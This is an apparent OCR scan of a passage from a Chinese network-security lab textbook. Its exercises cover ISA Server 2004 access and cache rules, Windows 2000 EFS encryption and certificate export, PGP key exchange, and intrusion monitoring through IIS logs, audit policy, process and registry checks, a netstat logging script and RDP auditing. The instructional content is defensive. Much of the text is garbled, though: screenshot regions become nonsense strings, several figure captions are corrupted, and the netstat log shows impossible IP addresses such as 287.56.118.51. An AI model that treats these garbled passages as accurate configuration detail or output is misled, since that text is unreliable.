在 “访问 规则 目标 ”对 话 框 中 , 单 击 “ 添 加 ”按钮 ,打开 “添加 网 络 实体 "对话 框 ,双击 “外 
部 ”, 然 后 单 击 “关闭 "按钮 , 单 击 “ 下 一 步 "按钮 ,如 图 9. 122 所 示 。 
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《上 一 步 四 | 下 一 步 @ 


9.122 添加 外 部 网 络 实体 


在 “用 户 集 ” 对 话 框 中 接受 默认 的 所 有 用 户 , 单 击 “ 下 一 步 ” 按 钮 ,如 图 9. 123 所 示 。 
在 “新 建 访问 规则 向 导 ” 对 话 框 中 回顾 选择 的 设置 ,然后 单 击 “ 完 成 ”按钮 。 
@ 新 建 一 条 允许 内 部 客户 访问 ISA Server 2004 服务 器 上 的 DNS 服务 的 访问 规则 。 


主要 步骤 和 上 面 一 样 ,不 同 的 地 方 : 


规则 名 : Allow internal acces firewall's dns service 


新 建 访问 规则 向 导 N ES 
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PE 
I 或 者 ， 您 可 以 限制 访问 特定 用 户 


此 规则 应 用 于 来 自 下 列 用 户 集 的 请 求 : 
enm maca 
KED. 
IUS QD | 


《上 一 步 中 ) 取消 


图 9.123 “用 户 集 ” 对 话 框 


在 协议” 对话 框 中 选择 “所 选 的 协议 ”选项 ,然后 单 击 " 添 加 ”选择 通用 协议 下 的 DNS, 
如 图 9. 124 所 示 。 
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《上 一 步 四 | 下 一 步 四 əf 取消 


EE 


图 9.124 选择 通用 协议 下 的 DNS 


访问 规则 目的 为 “本 地 主机 ”, 如 图 9.125 所 示 。 

此 时 ,ISA Server 2004 的 管理 控制 台 应 该 如 图 9. 126 所 示 , 单 击 “ 应 用 ”按钮 以 保存 修 
改 和 更 新 防火 墙 策 略 。 

在 “应 用 新 配置 "对话 框 中 单 击 “ 确 定 ” 按 钮 ,如 图 9. 127 所 示 。 

此 时 ,ISA Server 2004 服务 器 的 初步 配置 已 经 完成 ,内 部 客户 可 以 访问 外 部 网 络 的 所 
有 服务 ,也 可 以 访问 ISA Server 2004 服务 器 上 的 DNS 服务 。 


How 


实验 


网 络 安 全 与 信息 保障 


EE — O 0 
访问 规则 目标 3 


此 规则 将 应 用 于 从 此 规则 源 发 送 到 此 页 指定 目标 的 通讯 。 
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Fd 9.125 访问 规则 目标 为 “本 地 主机 ” 
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图 9.126 单 击 “ 应 用 ”按钮 


d) I YPN 设置 。 这 可 能 需要 几 分 


图 9.127 “应 用 新 配置 "对 话 框 


三 、 启 用 绥 存 
启用 缓存 有 两 个 条 件 ,首先 是 设置 了 缓存 所 用 的 驱动 器 ,其 次 是 设置 缓存 规则 。 


(1) 设置 缓存 所 用 的 驱动 器 
在 ISA Server 2004 管理 控制 台 的 “缓存 ”上 右 击 ,选择 "定义 缓存 驱动 器 "选项 如 


图 9. 128 所 示 。 


注意 ,此 时 的 缓存 上 有 个 向 下 的 红色 箭头 ,表明 没有 启用 缓存 。 
在 "定义 缓存 驱动 器 ?对 话 框 中 ,根据 自己 的 网 络 带宽 及 流量 进行 设置 ,不 过 需要 注意 的 
是 ,缓存 驱动 器 必须 采用 NTFS 分 区 格式 ,如 图 9. 129 所 示 。 
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图 9.128 定义 缓存 驱动 器 图 9. 129 “定义 缓存 驱动 器 "对 话 框 


(2) 设置 缓存 规则 
此 时 “缓存 "上 已 经 没有 向 下 的 箭头 了 ,表明 已 经 设置 了 缓存 驱动 器 。 在 “缓存 "上 右 击 ， 
指向 “新 建 ”, 单 击 “ 缓 存 规 则 ”选项 ,如 图 9. 130 所 示 。 
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图 9. 130 ”缓存 规则 


在 “新 缓存 规则 向 导 ” 对 话 框 中 输入 名 称 Cache external content ,然后 单 击 “下 一 步 ? 按 
钮 。 在 “缓存 规则 目标 "对话 框 中 单 击 “ 添 加 ”按钮 ,选择 “外 部 ”选项 , 单 击 “ 下 一 步 ” 按 钮 ,如 
图 9.131 所 示 。 
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图 9.131 添加 网 络 实体 


在 “内容 检索 ”对 话 框 中 ,接受 默认 的 “只 有 在 缓存 中 存在 对 象 的 一 个 有 效 版 本 时 。 如 果 
不 存在 有 效 版 本 , 则 传递 请 求 到 服务 器 (0O)。”, 单 击 “ 下 一 步 "按钮 ,如 图 9. 132 所 示 。 
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DRIN ERN ERE 


C 如 果 缓存 中 存在 对 象 的 任何 版 本 。 加 果 不 存在 ， 则 传递 请 求 到 服务 器 C. 
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图 9.132 “内 容 检索 ”对 话 框 


在 “缓存 内 容 ” 对 话 框 ,接受 默认 的 “如 果 源 和 请 求 头 指明 要 缓存 " 单 选 按 钮 ,可 以 根据 需 
要 勾 选 下 面 的 选项 , 单 击 * 下 一 步 ?按钮 ,如 图 9.133 所 示 。 

在 “缓存 高 级 配置 ?对 话 框 ,根据 自己 的 需要 进行 设置 , 单 击 " 下 一 步 ?按钮 ,如 图 9. 134 所 示 。 

在 “HTTP 缓存 "对话 框 中 ,接受 默认 的 选项 , 单 击 * 下 一 步 ? 按 钮 ,如 图 9. 135 所 示 。 

在 “FTP 缓存 "对话 框 中 取消 “启用 FTP 缓存 ”选项 (可 以 根据 需求 进行 设置 ), 单 击 “ 下 
一 步 ? 按 钮 ,如 图 9. 136 所 示 。 

在 “新 缓存 规则 向 导 ” 对 话 框 中 ,回顾 设置 ,然后 单 击 “ 完 成 ”按钮 。 单 击 “ 应 用 ”按钮 以 保 
存 修改 和 更 新 防火 墙 策 略 ,ISA Server 2004 会 弹出 一 个 警告 提示 ,选择 “保存 更 改 , 并 重启 
动 服务 ”选项 ,然后 单 击 “ 确 定 ” 按 钮 ,如 图 9. 137 所 示 。 
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9.134 “缓存 高 级 配置 "对 话 框 
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9.135 "HTTP 缓存 对话 框 
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生存 时 间 CTTL) 是 内 容 在 过 期 前 在 缓存 中 保存 的 时 间 。 
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图 9. 136 “FTP 缓存 ”对话 框 


Q) 只 有 在 下 列 服务 重启 动 后 才 会 应 用 更 改 : 
Microsoft 防火 墙 


C 保存 更 改 ,但 不 重启 动 服务 QD 
只 有 在 手动 重启 动 服务 后 才 应 用 更 改 。 
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图 9.137 “ISA 服务 器 警告 "对 话 框 


成 功 后 会 在 缓存 规则 栏 中 看 见 新 的 缓存 规则 ,如 图 9. 138 所 示 。 


应 用 新 配置 


2 成 功 应 用 了 对 配置 的 更 改 。 EX 


图 9.138 新 的 缓存 规则 


(3) 取消 FTP 的 只 读 
ISA Server 2004 默认 是 不 允许 FTP 上 传 的 ( 即 不 能 写 FTP 服务 器 ) 。 取 消 的 办 法 是 : 
在 允许 访问 FTP 服务 器 的 规则 上 (在 这 里 是 Allow all outbound traffic) 右 击 , 然 后 选择 “本 
置 FTP? 按 钮 ,如 图 9. 139 所 示 。 
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图 9.139 配置 FTP 


在 “配置 FTP 协议 策略 ”对 话 框 中 ,取消 “只 读 ” 的 勾 选 , 单 击 “ 确 定 ” 按 钮 ,最 后 单 击 “ 应 
用 ”按钮 以 保存 修改 和 更 新 防火 墙 策略 ,如 图 9. 140 所 示 。 
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图 9. 140 “配置 FTP 协议 策略 ”对话 框 


实验 十 “Windows 2000 的 文件 加 密 


实验 目的 : 提高 Windows 2000 的 安全 性 。 
实验 步骤 如 下 。 


任务 一 “文件 夹 的 加 密 
CD. 在 任何 一 个 文件 或 文件 夹 上 右 击 ,在 弹出 的 快捷 菜单 中 选择 * 属 性 "选项 , 如 
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图 9. 141 所 示 。 

(2) 单 击 “ 高 级 ”按钮 (前 提 是 硬盘 格式 必须 是 NTFS) 。 

(3) 可 以 直接 加 密 文件 了 (这 时 要 注意 ,加 密 选 项 与 压缩 选项 并 不 能 同时 进行 ,不 能 对 
NTFS 压缩 的 文件 进行 加 密 ), 如 图 9. 142 所 示 。 
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图 9.141 选择 “属性 ”选项 图 9.142 ”加密 文件 


(4) 在 图 9. 142 中 单 击 “ 应 用 ”按钮 。 

加 密 后 的 文件 只 有 本 人 才能 够 打开 ,其 他 用 户 就 不 会 看 到 被 加 密 过 的 文件 的 内 容 了 。 
而 使 用 加 密 的 文件 时 是 透明 的 ,就 像 用 普通 的 文件 一 样 , 不 需要 进行 解密 等 操作 。 
任务 二 ”EFS 的 实现 

CD 在 “控制 面板 ”窗口 中 单 击 “ 用 户 和 密码 "图标, 在 弹出 的 窗口 中 单 击 “ 高 级 ”一 “证 
书 ” 按 钮 ,就 会 出 现 “ 证 书 ” 窗 口 。 选 中 “我 们 的 密码 ”, 单 击 “ 导 出 ”按钮 ,就 会 出 现 “ 证 书 导出 
向 导 ” 对 话 框 ,如 图 9. 143 所 示 。 
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图 9. 143 “证 书 导 出 向 导 ” 对 话 框 


(2) 单 击 “ 下 一 步 ” 按 钮 ,打开 “导出 文件 格式 ”对 话 框 ,如 图 9. 144 所 示 。 
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图 9.144 “导出 文件 格式 "对 话 框 


G) 单 击 “ 下 一 步 ”按钮 ,输入 私 钥 密 码 , 如 图 9. 145 所 示 。 
x 
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图 9.145 输入 私 钥 密 码 


(4) 单 击 “下 一 步 ?按钮 ,填写 要 导出 的 文件 ,如 图 9. 146 所 示 。 
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图 9.146 填写 要 导出 的 文件 
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O) 再 单 击 “ 下 一 步 ” 按 钮 ,导出 成 功 ,如 图 9. 147 所 示 。 


正在 完成 证 书 导出 向 导 


您 已 成 功 地 完成 证 蔬 导出 向 导 - 

您 已 指定 下 列 设置 

[Z8 | 
导出 密 钥 是 | 
包括 证 书 路 径 中 所 有 证 书 S | 
文件 格式 个 人 信息 交换 (x. pf) | 

证 书 导 出 向 导 区 | 

导出 成 功 。 


[| 
图 9.147 导出 成 功 
(6) 单 击 “控制 面板 "窗口 中 的 用户 和 密码 "图标 ,再 单 击 “ 高 级 "按钮 , 单 击 “ 证 书 ” 按 钮 ,在 证 
书 窗口 中 单 击 “ 导 入 ”就 会 出 现 “ 证 书 导 和 人 向 导 ” 对 话 框 , 单 击 “ 下 一 步 ” 按 钮 ,如 图 9. 148 所 示 。 
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图 9.148. “证 书 导入 向 导 "对 话 框 


CD) 单 击 “ 下 一 步 ” 按 钮 , 选 定 导 出 的 文件 后 导入 ,如 图 9. 149 所 示 。 
到 | 
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图 9.149 导入 


(8) 单 击 * 下 一 步 " 按 钮 ,输入 私 钥 密 码 , 如 图 9. 150 所 示 。 
x 


为 了 保证 安全 ,已 用 密码 保护 徐 钥 。 


ABA SM. 
sup 
Je 


r 人 如果 启用 这 个 选项 ， 每 次 应 用 程序 使 用 私 钥 时 ， 您 都 


Tv 标志 此 密 角 为 可 导出 的 。 这 格 万 许 您 在 稍 后 备份 或 传输 密 钥 Q0. 


m | 
图 9.150 ”输入 私 钥 密码 


(9) 单 击 “ 下 一 步 ” 按 钮 ,打开 “证 书 存储 ”对 话 框 ,如 图 9. 151 所 示 。 


证 书 导 入 向 导 E 
EBF 
证 书 存储 区 是 保存 证 书 的 系统 区 域 。 


Windows 可 以 自动 碗 择 证 书 存 信 区 ， 歌 者 您 可 以 为 证 书 指定 一 个 位 置 。 
C BREBAN, EISSHERSUESSSERI QD) 
C MSEIREDUESRUA TATAE ©) 


jme. | 


Ll» 
图 9. 151 “证 书 存储 ”对话 框 


(10) 再 单 击 “ 下 一 步 ” 按 钮 ,如 图 9. 152 所 示 。 


xi 
正在 完成 证 书 导入 向 导 
人 已 成 功 地 完成 证 书 导入 向 导 - 
你 已 指 定 下 列 设置 


m 


PH 
D:\Documents and SettingsMdnii 


到 


CE ww 


图 9.152 正在 完成 证 书 导 入 向 导 
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实验 十 一 ”PGP 实验 


实验 目的 : 用 PGP 软件 来 安全 地 交换 文件 。 
实验 工具 : PGP Freeware 6.5. 8, 
实验 步骤 如 下 。 


任务 一 安装 软件 


CD 安装 PGP Freeware 6. 5.8, 如 图 9. 153 所 示 。 


Welcome E E 


Welcome to the PGP Setup program. This program 
will install PGP on your computer. 


It is strongly recommended that you exit all Windows programs 
before running this Setup program. 


Click Cancel to quit Setup and then close any programs you 
have running. Click Next to continue with the Setup program. 


WARNING: This program is protected by copyright law and 


Unauthorized reproduction or distibution of this program, or any 
portion of it, may result in severe civil and criminal penalties, and 
wil be prosecuted to the maximum extent possible under law. 


[mE 


图 9.153 安装 PGP Freeware 6. 5. 8 


(2) 选择 安装 目录 ,如 图 9. 154 所 示 。 


Choose Destination Location E xj 
Setup will install PGP in the following folder. 
To install to this folder, click Next. 


To aral to a ditare oe iok Downs and eec one 


ET e eas 
etup. 


[Dessin For 
| FA Mletwork Associates\PGPNT Browse... 


cnca | 


图 9.154 选择 安装 目录 


(3) 安装 完成 如 图 9. 155 所 示 。 


Setup Complete 
Setup has finished inctaling PGP on your computer. 


Setup can launch the Read Me fle and PGP. Choose the 
options you want below. 


F Tareh PaPe] 


Click Finish to complete Setup. 


[NN 


图 9.155 安装 完成 


任务 二 ARBA 
CD 启动 密 钥 生成 过 程 ,如 图 9. 156 所 示 。 
到 


In order for other people to send you secure messages, you must 
generate a key pair. 


Your key pair will also be used to sign digital documents. 


ed rectis, iem a The 
public key should be [PGP has 
faciiies to assat mta] T De I 
absolutely secret 


IL you wouid ike more information on what a key pair is and how 
IP works, chick the Help bution, below. 


Otherwise, choose Next to continue. 
Eso] ww | ww | 
图 9.156 启动 密 钥 生成 


(2) 输入 名 字 和 E-mail 地 址 ,如 图 9. 157 所 示 。 
[kev Generation wear E | 


BE nana Cop LCD si E CA 
pair 


By listing your name and email address here, you let your 
correspondent: know that the key they are using belongs to you. 


Email address: 
[ehangheng@nese com 


m | æ 


图 9.157 输入 名 字 和 E-mail 地 址 


How 
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(3) 选择 加 密 方式 如 图 9. 158 所 示 。 


Key Generation Wizard E E: 


What type of key would you like to generate? If you don't know, 
it's recommended that you generate a Diffie-Helman/DS key 
pait. 


RSA is the "old-style" PGP key. Most new users of PGP will be 
expecting a Diffie-Hellman/DSS key. 


Mf you'd ike more information on the differences between the two 
key types, press the Help button, below. 


Key Pat Type 


G DilfeHelinar/DS8] 
C BSA 


m | m 


图 9.158 选择 加 密 方式 


(4) 选择 加 密 长 度 , 如 图 9.159 所 示 。 
ES] 


"What type of key would you ike to generate? If you don't know, 
it's recommended that you generate a ifie Heliman/DSS key 
pai. 

RSA is the "old-style" PGP key. Most new users of PGP will be. 
expecting a Diffie-Helman/DSS key. 


If you'd ike more information on the differences between the two 
key types, press the Help button, below. 


Key Pair Type 一 一 — 
[3 ielmar/DS: 
C BSA 


E m 
Hd 9.159 选择 加 密 长 度 


C5) 选择 密 钥 不 过 期 ,如 图 9. 160 所 示 。 
xi 


You can set your key pair to automatically expire within a certain 
amount of time. 


When your key pair expires, you will no longer be able to use it for 
enctypling or signing. However, R will stil dectypt and veriy. 


Once you generate your key pait, you wil not be able to change. 
its expiration setting. 

Key Expration. 

C Key psi never expred 

C Keypsrexpreson [2005 435 7 


sv] m | "| 


图 9.160 ” 密 钥 不 过 期 


(6) 输入 私 钥 的 密码 (建议 不 要 少 于 8 位 ) ,如 图 9.161 所 示 。 


Key General 


d E 


You can set your key pair to automatically expire within a certan 
amount of time. 


When you key pair expires. you wil no longer be able to use it for 
enctypling or signing. However, it will stil decrypt and verify. 


Once you generale your key pair, you wil not be able to change. 
Rs expration setting. 


KeyExpration ~ — ——34 
€ Key pat never exei 
C Keyparewpreson [xx 415 = 


m» | w» | 
图 9.161 输入 私 钥 密码 


C) 密 钥 计算 成 功 , 如 图 9. 162 所 示 。 
eration xj 


Complete 
omn a | ww 
E 9.162 密 钥 计 算 成 功 


(8) 密 钥 生成 ,如 图 9. 163 所 示 。 


本 
Ele gdt yew Keys Server Groups Help 


vix4goretcu 


区 Trust | Sze n 
EO Nicholas J. Tamagni <ntamagnipgp.c... @ M 3000/1024  DHJDSS public ley 

田 @ Nicholas Ryan <nryan@pgp.com> @ I 2048/1024  DH/DSS pubic key 

EO Nosh Dibner Salzman <noah@pgp.com> @ — [— 2281/1024  DH/DSS publc key 

困 @ PaulB. Johnson <pbjgpgp.com> Q  L—— 2048/1024  DH|DSS publc key 

mO Phil Nathan <phiipnGpgp,com> Q CC 2048/1024 — DHJDSS publ key 

GÓP PhipR. Zimmermann «przOpgp.com» @ M 2048/1024 — DHJDSS pubic key 

EO Rafael Jerez <RJerez@nai.com> @ CC 2048/1024 DHJDSS publ key 

m Salah Zadeh «sziadehepgo.com» @ CC 208/1024 Expired DH/DSS public key 
BO Scott J. Wison <swilson®nai.com> Q C 2048/1024  DH[DSS pubic key 

mO Sean Tran <Sean_tran@nai.com> @ CC 30721024  DH[DSS public key 

m Sonny D. Luu <suuBnaicom> @ CC 2048/1024  DH/DSS public key 

mO Vue vL Vang <vvang@nai.com> @ CC 4096/1024  DHJDSS public key 

mO wil Price <wprice@pgp.com> @ E «01024 DH/DSS public key 

7 @ 
A, zhangheng <zhanghengBncse … 

E D 
1key(s) selected [ A 


图 9.163 WHER 


实验 


How 
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任务 三 ”与 对 方 交换 公 铀 


d) 导出 自己 的 公 钥 ,如 图 9. 164 所 示 。 
IE 
SED. [mu sm :)jescktEM 


文人 四。 pere REO 
RRND: [ASCII Key File (+. asc) 了 取消 


T^ Include Private Keyís] 
I Include & 0 Extensions 


图 9.164 导出 自己 的 公 钥 


(2) 生成 自己 的 公 钥 (所 选中 的 文件 就 是 自己 的 公 钥 ), 如 图 9. 165 所 示 。 


| 622 Are | rs mt -j porone 
图 9.165 "Em Ham 


(3) 与 对 方 交换 公 钥 (所 选 文件 就 是 对 方 的 公 钥 ) ,如 图 9. 166 所 示 。 
任务 四 加 密 并 交换 文件 

CD 双击 密 钥 导 和 对方 的 公 钥 ,图 9. 167 所 示 。 

(2) 导 和 成功 ,如 图 9. 168 所 示 。 


am» 621 


rom |mrerkec me e [igestremer] 
图 9.166 与 对 方 交 换 公 钥 


S 


CE) 

Select the key(s] you would ike to import to your keyring : 
[keys [vy | mus [sz | 

[ocsesutudent <ncse@ncse. net > sms NA 2046f1024 | 


g> 


划 
Select All Unselect All. lmport | Cancel 
图 9.167 导入 对 方 的 公 钥 


Lonkes -oo 


Ele Edt yew Keys Server Groups Heb 


Szard SE 
C) 


EO Ann Campi <acampi@nal. com> 

& OP Bil Blanke <wbgpop com> 

mO Chanda Groom <chanda_groom@nai.c... 

mO Damon Galaty <dgalPpgp.com> 

EO Jason Bobier <jason@pgp.com> 

EO Katherine Massucci Pettit <kmp@pgp 

EO Marc Dyksterhouse <marcd@pap.com> 

mO Mark J. McArde <markm@pap.com> 

国 @ Michael K, Jones <mjones@nai.com> 
名 Myles Monroe <mmonroe@nai.com> 


I OP. Network Associates PGP Software Rel... 
mO Network Associates TNS Division Emplo. 
O Nicholas J. Tamagni «ntamagnigpgp.t... 
© Nicholas Ryan «rryanGpap.com» 
Om Noah Dibner Salman <noah@pgp.com> 
OP Pad B. Johnson <pbj@pgp.com> 


= 

L—— 1024 DHIDSS public key 
T——— 3000/1024 — DHJDSS public key. 
L——— 2048/1024 — DH/DSSpublickey 
L——— 2281/1024 — DHJDSS public key 
L——— 2048/1024 — DH/DSSpublickey 
T——— 2046/1004 — DHIDSS public key 


(9096090609090 OHOCOCOCOCCOOOCOOR 


DSS exportable signature. 
1024 DHIDSS public key 


[1 key(s) selected. f 


图 9.168 导入 成 功 


实验 


How 
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G) 用 对 方 的 公 钥 加 密 所 要 发 给 对 方 的 文件 ,如 图 9. 169 所 示 。 


B$ PGPshell - Key Selection Dialog RESI 


图 9.169 用 对 方 的 公 钥 加 密 


(4) 生成 加 密 后 的 文件 (所 选 文件 就 是 加 密 后 的 文件 ,原来 是 TXT 文件 ) ,如 图 9.170 所 示 。 


am| ODd Lacra me: japona -mairan [gant sna: | 


图 9.170 生成 加 密 后 的 文件 
(5) 与 对 方 交换 加 密 后 的 文件 。 
任务 五 ”打开 对 方 给 自己 的 加 密 文 件 


CD 选中 文件 ,用 自己 的 私 钥 进 行 解密 ,提示 输入 自己 私 钥 的 密码 ,如 图 9. 171 所 示 。 
(2) 输入 正确 的 私 钥 密 码 后 ,会 自动 生成 一 个 同名 文件 (所 选中 的 文件 ) ,如 图 9. 172 所 示 。 
G) 打开 明文 文件 ,看 到 内 容 ,实验 成 功 。 


ixi 
Message was encrypted to the following public keys] : 
zhangheng <zhangheng@ncse.com> (DH/2048) 


Enter passphrase for your private key : Iv Hide Typing 


Note: Caps Lock is down. Passphrases are case-sensitive. 


Los] cm | 


图 9.171 用 自己 的 私 钥 进行 解密 


图 9.172 生成 一 个 同名 文件 


实验 总 结 : 


PGP Freeware 是 一 种 很 实用 的 非 对 称 公 钥 加 密 软件 ,可 以 对 各 种 类 型 的 文件 以 及 


E-mail 进行 加 密 。 
实验 十 二 ”配置 Windows 2000 Server 入 侵 监 测 


实验 目的 : 提高 Windows 2000 的 安全 性 。 
实验 步骤 如 下 。 


任务 一 基于 80 端口 入 侵 的 检测 


(D 配置 IIS 自 带 的 日 志 功 能 。 首 先 执行 “程序 ”>“ 管 理工 具 ”>“Internet 服务 管理 


mow 
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器 ”命令 ,如 图 9.173 所 示 。 


^ E OSMESTPUAGERE 
» O SUKRRSDOR 


图 9.173 配置 IS 自 带 的 日 志 


(2) 找到 需要 记录 日 志 的 站 点 , 右 击 , 在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 如 图 9. 174 
所 示 。 


XE Internet 信息 服务 


中 Wnetpublsarpts 
dilwinntlhelplishelp. 
DAWINNTISystem32|inetsrvlisadmin 
dilnetpubliissamples 

d:\program files\common filesisystemlmsadc 
D:\Program Files\Common Files\Microsoft Shared\wet 
DIVWWINNTWweb\printers 


or rd [ 


图 9. 174 找到 需 要 记录 日 志 的 站 点 


(3) 勾 选 启动 日 志 记录 ?项 , 单 击 * 属 性 ?项 ,如 图 9. 175 所 示 。 
CD 利用 find 命令 来 过 滤 查 找 日 志文 件 , 如 图 9. 176 所 示 。 


ENEZ 
目录 安全 性 | mrk | 。 自 定义 错误 信息 | 
Web 站 点 | 操作 员 | 性 能 ”| sarts | E 
则 扩充 日 志 记 录 屋 性 
常规 属性 | 扩充 的 属性 | 
新 日 志 时 间 间 隔 
C 每 小 时 0 
A 人 BX D 
bl C SAW 
个 每 月 如 
C 文件 大 小 无 限 中 
C 当 文件 大 小 达到 芭 ) 


pompe 
[- 为 文件 命名 回 闪 合用 本 地 时 间 T S 
日 志文 件 目录 C) 


swimpirx\systensz\Logfiles 浏览 @) 


日 志文 件 名 :Wa3SYC1\exyynmdd log 


Ax 


服务 器 扩展 
目录 | 文档 


xi 


[we ] we | sso | 


帮助 


图 9.175 扩充 日 志 属性 


FIND C/V] L/C] [/N] [/I] "string" [[drive:][path]filenane[ 


图 9.176 利用 find 命令 来 过 


任务 二 基于 安全 上 日志 的 检测 


Windows 2000 自 带 了 相当 强大 的 安全 日 志 系统 ,从 用 
细 的 记录 ,可惜 的 是 ,默认 安装 下 安全 审核 是 关闭 的 ,以 至 了 


滤 查 找 日 志文 件 


户 登录 到 特权 的 使 用 都 有 非常 详 
F 一些 主 机 被 黑客 攻击 后 根本 没 


T 


法 追踪 入侵 者 。 


CD 执行 “开始 ">" 程序 ”>“ 管 理工 具 ”>“ 本 地 安全 策略 ”>“ 本 地 策略 ”~“ 审 核 策略 ” 


命令 ,如 图 9.177 所 示 。 


à 


so 


网 络 安 全 与 信息 保障 


[ESSERE 
| stw sv EIEESISIEJESEE] 


aj E E 
安全 设置 无 审核 无 审核 
m CB 帐户 策略 无 审核 xeu 
5 C8 本 地 第 咯 无 审核 无 审核 
COE 无 审核 无 审核 
c CS 用 户 权 利 指派 无 审核 无 审核 
EESTI 无 审核 无 审核 
LER od 无 审核 无 审核 
DS 安全 策略 ,在 可 上 无 审核 xeu 
无 审核 无 审核 

到 到 


I I 
图 9.177 本 地 安全 设置 


(2) 打开 必要 的 审核 ,如 图 9. 178 所 示 。 


a sv |e >» ame 


本地 策略 
EHI 
B 用 户 权利 指派 


图 9.178 打开 必要 的 审核 


O 将 安全 日 志 的 大 小 指定 为 50000KB 并 且 只 允许 覆盖 7 天 前 的 日 志 , 可 以 避免 老练 
的 入侵 者 通过 洪水 般 的 伪造 人 侵 请 求 ,覆盖 掉 他 真正 的 行踪 ,如 图 9. 179 所 示 。 
TA mem] 
pun [LI ToOMMCTLD --—--«-—-————! 
日 志 名 称 : [WINT Systen32iconfig\SecEvent. Evt 


X 192.0 KB (196,608 FP) 
创建 时 间 : 2004 年 2 月 15 日 21:18:25 
修改 时 间 : 2004 年 5 月 4 日 9:32:19 
访问 时 间 ; 2004 年 5 月 4 日 9:32:19 
~ 日 志 大 小 
TSRUA [pus 习 m 
当 达 到 最 大 的 日 志 尺 寸 时 : 


C 按 需要 改写 事件 O 
C 改写 入 于 f E: 天 的 事件 


E cm JEROSER B C 


»| 
$o||| r emssso gms 
Be | 


图 9.179 安全 日 志 属性 


任务 三 文件 访问 日 志 与 关键 文件 保护 


除了 系统 默认 的 安全 审核 外 ,对 于 关键 的 文件 ,还 要 加 设 文件 访问 日 志 , 记 录 对 他 们 的 
访问 。 关 键 文件 不 仅 是 指 系 统 文件 ,还 包括 有 可 能 对 系统 管理 员 / 其 他 用 户 构成 危害 的 任何 文 
件 , 例 如 ,系统 管理 员 的 配置 .桌面 文件 等 ,这 些 都 是 有 可 能 用 来 窃取 系统 管理 员 资料 /密码 的 。 


任务 四 进程 监控 


进程 监控 技术 是 追踪 木马 后 门 的 另 一 个 有 力 武 器 ,90% 以 上 的 木马 和 后 门 是 以 进程 的 
形式 存在 的 (也 有 以 其 他 形式 存在 的 木马 ) ,作为 系统 管理 员 , 了 解 服务 器 上 运行 的 每 个 进程 
是 职责 之 一 (否则 不 要 说 安全 , 连 系 统 优 化 都 没有 办 法 做 ) ,做 一 份 每 台 服 务 器 运行 进程 的 列 
表 非 常 必要 ,能 帮助 管理 员 一 眼 就 发 现 人 侵 进 程 , 异 常 的 用 户 进 程 或 异常 的 资源 占用 都 有 可 
能 是 非法 进程 。 除 了 进程 外 ,DLL 也 是 危险 的 东西 ,例如 ,把 原本 是 exe 类 型 的 木马 改写 为 
dll 后 ,使 用 run dll32 运行 就 比较 具有 迷惑 性 。 

下 载 木马 分 析 专 家 IE 防火 墙 安装 到 计算 机 ,如 图 9. 180 所 示 。 


4 木马 分 析 专家 Y5.92 EK Win9«/2000/XPHERE TERRA 
VindovelUFE EDUR EERIE RERO 
MMCEXE 


EEI 
S iisxormem] 
wman: ME OOR) 
文件 大 小 : 攻 jena: E 一 一 一 也 
进程 级 别 : ARTN jens Meranu —0000 jum 
的 出 新 列表 | [d 所 有 程序 | [formes] [A seam 
e vans anan) [g tura) [H wee 
Dume) [B oror) [P cusa] [0 退出 进程 


图 9. 180 利用 木马 分 析 专 家 查看 隐藏 进程 


运行 该 程序 就 能 直接 看 到 ,所 有 的 进程 包含 隐藏 的 进程 。 
任务 五 ”注册 表 校 验 


D 下 载 木 马 分 析 专 家 IE 防火 墙 安装 到 计算 机 并 运行 ,如 图 9. 181 Bros. 
D 单 击 木马 分 析 专 业 防 火 墙 ,然后 运行 注册 表 分 析 , 如 图 9.182 Bron. 


h 木马 分 析 专家 Y5.92 查 杀 Win9x/2000/xp 进 程 下 的 病毒 [区 变量 P e E | 
FMindows 程 序 进程 列表 (包含 被 隐藏 的 进程 ) 查 杀 未 知 森马 


IMSTASK EXE 

Meter ER 
d 

Eve [o marane] v 
详细 资料 :|MSNMSGR EXE 高 级 属性 | 
xer E Jarena : Æ Is 

HRO : DUNS BUE IE: 注册 


的 刷新 列表 [d rer] [Branns] [A sucum 
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图 9. 181 木马 分 析 专 家 运行 界面 图 9.182 运行 注册 表 分 析 
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(3) 在 注册 表 分 析 专 家 上 击 右 ,就 可 以 对 注册 表 进 行 校 验 了 ,如 图 9. 183 所 示 。 
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(5 注册 表 分 析 专 家 | 
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图 9.183 ”对 注册 表 进 行 校 验 
任务 六 端口 监控 


用 脚本 来 进行 IP 日 志 记录 。 


(1) 新 建文 本 文件 。 取 名 为 Netstat. bat 运行 。 


然后 编辑 写 人 Netstat -n -p tep 10 >> 
Netstat. log ,如 图 9. 184 所 示 。 
oix 
文件 (E) 编辑 (E) 格式 (0) 帮助 (H) 
Netstat -n -p tcp 16»»Netstat.log 


图 9.184 新 建文 本 文件 


(2) 运行 Netstat. bat, 如 图 9. 185 所 示 。 


[D:NDocuments and Settingsvadmin\ 齐 面 yNetstat -n -p tcp 18 1>>Netstat-log| 


图 9.185 运行 Netstat. bat 


G) 当 有 TCP 连接 的 话 , 这 个 脚本 将 会 自动 记录 时 间 和 TCP 连接 状态 ,如 图 
所 示 。 


9. 186 


局 Netstatlog -记事 本 p =| 口 |x| 


文件 (E) BD fexto) 帮助 (H) 


fictive Connections 


Proto Local fiddress Foreign Address State 
TCP 192.168.0.110:4008 287.56.118.51:80 ESTABLISHED 


Active Connections 


Proto Local fiddress Foreign hddress State 
TCP 192.168.0.110:^008 287.56.110.51:80 ESTABLISHED 


fictive Connections 


Proto Local fiddress Foreign Address State 
TCP 192.168.0.110:5008 287.56.110.51:80 ESTABLISHED 


Active Connections 


Proto Local Address Foreign Address State 
TCP 192.168.0.110:5008 287.56.118.51:88 ESTABLISHED 
TCP 192.168.8.118:5111 287.h6.250.252:88 ESTABLISHED 


Active Connections 


Proto Local Address Foreign Address State à 
» 


«| J 


图 9.186 自动 记录 时 间 和 TCP 连接 状态 


任务 七 ”终端 服务 的 日 志 监 控 


OD 执行 “开始 ”一 “程序 ”管理 工具 ?找到 终端 服务 配置 命令 ,如 图 9. 187 所 示 。 

(2) 单 击 “连接 ”按钮 , 右 击 需要 配置 的 RDP 服务 (如 RDP-TCP(CMicrosoft RDP 5.0), 
选中 书签 “权限 ”, 单 击 左 下 角 的 “高 级 "按钮 ,选择 “审核 "选项 来 加 入 一 个 Everyone 组 ,这 代 
表 所 有 的 用 户 , 如 图 9. 188 所 示 。 
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图 9.187 找到 终端 服务 配置 
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图 9.188 配置 RDP 服务 


